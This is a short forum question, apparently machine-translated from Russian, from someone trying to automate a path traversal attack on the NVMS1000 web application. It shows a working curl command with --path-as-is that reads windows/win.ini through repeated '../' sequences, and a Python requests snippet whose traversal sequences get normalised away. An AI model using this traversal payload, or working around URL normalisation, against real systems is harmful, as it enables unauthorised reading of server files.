недавно я хотел автоматизировать атаку для веб-приложения, склонного к атакам с обходом пути (NVMS1000) через модуль python запросов.
Запрос отлично работает с curl с помощью опции path-as -is:
curl --path-as-is http://127.0.0.1/../../../../../../../../../../windows/win.ini
Однако при использовании модуля python запрашивает "../", где он убран из urlpath (как я отчетливо вижу, например, через Burp Suite):
host = "127.0.0.1"
path = "/../../../../../../../../../.."
file = "/windows/win.ini"
url = host+path+file
response = requests.get(url,proxies=proxies)
Я проверил документы, но не нашел объяснения этому поведению и не нашел опцию, позволяющую предотвратить зачистку / нормализацию, аналогичную опции для curl.
платформа - debian, модуль запроса - версия 2.22.0
Спасибо за вашу помощь.